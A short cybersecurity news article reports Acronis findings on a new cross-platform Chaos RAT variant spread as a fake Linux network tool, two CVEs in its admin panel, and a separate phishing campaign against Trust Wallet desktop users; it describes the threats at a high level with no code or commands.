Cybersecurity experts have linked a fresh strain of Chaos RAT, a remote access trojan built in Go, now going after both Windows and Linux machines.
According to findings from Acronis, the attackers are tricking users by packaging the malware as a seemingly harmless Linux network tool, with filenames like “NetworkAnalyzer.tar.gz” to make it look legit.
Chaos RAT mimics the functionality of tools like Cobalt Strike and Silver, furnishing an administrative panel to craft payloads and manage infected systems. After deployment, it connects to a remote server and enables operations such as reverse shell access, file manipulation, and system monitoring.
Chaos RAT has shown up in a bunch of cryptocurrency mining attacks recently. In most cases, attackers trick people with phishing emails that deliver malicious scripts that modify /etc/crontab, ensuring persistent access to infected Linux machines.
The newest version of Chaos RAT (5.0.3) was released in May 2024. Before that, it was often used alongside cryptocurrency miners, primarily for reconnaissance and lateral movement within compromised systems.
Security researchers have also uncovered two critical vulnerabilities in Chaos RAT’s administrative panel:
CVE-2024-30850 (CVSS 8.8): a command injection flaw.
CVE-2024-31839 (CVSS 4.8): a cross-site scripting (XXS) vulnerability.
No one’s sure yet who is behind the Chaos RAT campaign, but they clearly show how threat actors are taking advantage of open-source tools. Since these tools are freely available, it’s getting harder to tell whether a hacker group is just criminal gang or something more organized like a nation-state actor.
On a different note, researchers also spotted another campaign targeting Trust Wallet desktop users. This one is distributing fake applications via phishing emails and deceptive download links to trick people into installing malware. Once it’s on the system, the malware grabs wallet credentials and private keys and even runs remote command execution, posing a serious threat to users of desktop-based cryptocurrency wallets.
